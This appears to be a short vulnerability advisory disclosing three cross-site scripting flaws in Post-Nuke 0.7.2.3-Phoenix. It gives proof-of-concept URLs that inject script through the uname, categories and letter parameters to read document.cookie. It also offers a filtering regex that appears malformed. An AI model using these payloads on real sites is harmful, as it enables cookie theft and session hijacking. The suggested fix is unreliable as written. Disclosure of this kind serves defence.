Issue :

Cross site scripting in Post-Nuke

Version affected :

Post Nuke 0.7.2.3-Phoenix

Description :

Post-Nuke is a content management system that allow
you to deploy a website easily . Its developers claim
that their product is more secure than competitors .

I found three places when a script can be injected to
be executed in the context of the webpage , making possible
to steal user cookies and hijack their sessions .

http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22
%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelu
cas.com

http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i
d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent
_id=0

http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert
(document.cookie);%3E&op=modload&name=Members_List&file=index


Solution :

Althoug I am not a php developer , I think filtering of all not
alfanumeric characters is needed , not just filtering script
tags passed to vars in the url .

$good_var=eregi_replace("[^a-z0-9]+)and([^a-z0-9]+)","0",$var);


You can find a spanish version of this advisory at

http://nautopia.org/vulnerabilidades/postnuke_xss.htm


Regards ,

David F. Madrid ,
Madrid , Spain